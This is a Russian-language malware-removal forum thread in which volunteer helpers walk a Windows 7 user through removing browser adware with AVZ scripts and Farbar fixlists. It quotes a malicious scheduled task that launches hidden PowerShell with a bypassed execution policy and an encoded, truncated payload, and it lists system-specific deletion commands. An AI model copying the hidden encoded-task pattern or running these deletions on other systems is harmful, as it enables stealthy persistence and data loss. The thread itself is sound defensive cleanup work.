Junior Member
Вес репутации
46
reimageplus.com + yxo. warmportrait. com + другие рекламные сайты
Добрый день! Поймал какую то хрень. Работаю через Opera. OS - Win7. В браурезе постоянно открываютя рекламные сайты, в том числе reimageplus.com + yxo. warmportrait. com + другие рекламные сайты. Прогонял разные утилиты антивирусные - не помогло. Прилагаю логи AVZ и HijackThis.exe. Буду благодарен за помощь.
Вложения
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) More100 , спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи .
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект .
Здравствуйте,
AVZ выполнить следующий скрипт .
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
Код:
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
DelBHO('{C6E45F53-BD91-4268-925B-D92C536B5F37}');
QuarantineFile('C:\Net\NetworkIndicator.exe','');
QuarantineFile('C:\Program Files (x86)\Common Files\Wondershare\Wondershare Compact\WSHelper.exe','');
QuarantineFile('C:\Program Files (x86)\Baidu\BaiduSd\3.0.0.4605\baidusdTray.exe','');
QuarantineFile('C:\Program Files (x86)\Baidu\BaiduAn\4.0.0.5166\BaiduAnTray.exe','');
QuarantineFile('C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe','');
DeleteFile('C:\Program Files (x86)\Baidu\BaiduAn\4.0.0.5166\BaiduAnTray.exe','32');
DeleteFile('C:\Program Files (x86)\Baidu\BaiduSd\3.0.0.4605\baidusdTray.exe','32');
DeleteFileMask('C:\Program Files (x86)\Baidu', '*', true, ' ');
DeleteDirectory('C:\Program Files (x86)\Baidu');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\baiduAnTray','command');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BaiduSdTray','command');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.
После перезагрузки:
- Выполните в AVZ:
Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин " вверху темы.
- Подготовьте лог AdwCleaner и приложите его в теме.
- Сделайте лог Check Browsers' LNK и приложите его в теме.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
46
Карантин приложил, Лог AdwCleaner и Check Browsers' LNK прилагаю
Вложения
Скачайте ClearLNK и сохраните архив с утилитой на рабочем столе. Распакуйте архив с утилитой в отдельную папку. Перенесите Check_Browsers_LNK.log на ClearLNK как показано на рисунке
Отчет о работе ClearLNK-<Дата>.log будет сохранен в папке LOG . Прикрепите этот отчет к своему следующему сообщению.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
46
Прикрепляю. Там есть строка "[SKIP] 1 "C:\PROGRA~3\Baidu\BaiduAn\SWMANA~1\-E773~1.LNK" (ярлык не найден)" -- это я уже его руками удалил
Вложения
- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание : необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5" .
Нажмите кнопку Scan . После окончания сканирования будет создан отчет (FRST.txt ) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt ). Пожалуйста, прикрепите его в следующем сообщении.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
46
Вложения
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2498478254-3172276784-286277453-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-2498478254-3172276784-286277453-1000\...\MountPoints2: {728a3a27-8128-11e5-9979-7824af9dabef} - G:\dvdcheck.exe
HKU\S-1-5-21-2498478254-3172276784-286277453-1000\...\MountPoints2: {af654fc0-636a-11e5-99dd-7824af9dabef} - F:\setup.exe
HKU\S-1-5-21-2498478254-3172276784-286277453-1000\...\MountPoints2: {e34e9aad-506a-11e5-9955-7824af9dabef} - F:\Startme.exe
HKU\S-1-5-21-2498478254-3172276784-286277453-1000\...\MountPoints2: {e5662922-506d-11e5-86d3-7824af9dabef} - F:\Startme.exe
Toolbar: HKLM - eShield - {C6E45F53-BD91-4268-925B-D92C536B5F37} - No File
Toolbar: HKU\S-1-5-21-2498478254-3172276784-286277453-1000 -> eShield - {C6E45F53-BD91-4268-925B-D92C536B5F37} - No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @baidu.com/BaidusdDetectNPPlugin -> C:\Program Files (x86)\Baidu\BaiduSd\3.0.0.4605\explugin\npBaiduSDDetectPlug.dll [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
2016-02-11 17:04 - 2016-02-11 17:04 - 00004881 _____ C:\Users\Все пользователи\rxsmznjf.zcp
2016-02-11 17:04 - 2016-02-11 17:04 - 00004881 _____ C:\ProgramData\rxsmznjf.zcp
Folder: C:\Program Files\MediaTek
Folder: C:\Program Files (x86)\MediaTek
2015-02-03 21:28 - 2015-02-03 21:28 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-07-15 16:18 - 2015-07-15 16:18 - 0004901 _____ () C:\ProgramData\eaapqbsg.gfr
2016-02-11 17:04 - 2016-02-11 17:04 - 0004881 _____ () C:\ProgramData\rxsmznjf.zcp
CustomCLSID: HKU\S-1-5-21-2498478254-3172276784-286277453-1000_Classes\CLSID\{C6E45F53-BD91-4268-925B-D92C536B5F37}\InprocServer32 -> no filepath
Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {9DC33A7D-D07C-4D3A-8C21-30DC36FADF98} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> No File <==== ATTENTION
Task: {DB162AC4-84A8-4BD7-B0E2-65234A1C8F71} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {DE512221-BE65-465E-8EE3-A869B2E8A003} - System32\Tasks\{BD9CFA64-D933-F789-2D02-ABF7CB529442} => /s /n /i:"/rt" "C:\PROGRA~3\bf5d8f4\1382c2e9.dll"
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
Folder: C:\PROGRA~3\bf5d8f4
C:\PROGRA~3\bf5d8f4
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\BaiduHips]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BaiduSdTray]
EmptyTemp:
Reboot:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt) . Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен .
Замечена задача на powershell который запускает закодированный скрипт:
Код:
Task: {CEACA580-E88D-427C-B657-2CB2F1A7F332} - System32\Tasks\{7E0C0947-0D05-0809-7811-7E0A7E7E117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9476 more characters).
Если незнакома выше указаная задача. тогда профиксите:
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
CreateRestorePoint:
CloseProcesses:
Task: {CEACA580-E88D-427C-B657-2CB2F1A7F332} - System32\Tasks\{7E0C0947-0D05-0809-7811-7E0A7E7E117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9476 more characters).
Reboot:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt) . Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен .
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
46
Вложения
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
46
Все хорошо. Спасибо большое. Рекламные сайты больше не открываются.
Итог лечения
Статистика проведенного лечения:
Получено карантинов: 1 Обработано файлов: 1 В ходе лечения вредоносные программы в карантинах не обнаружены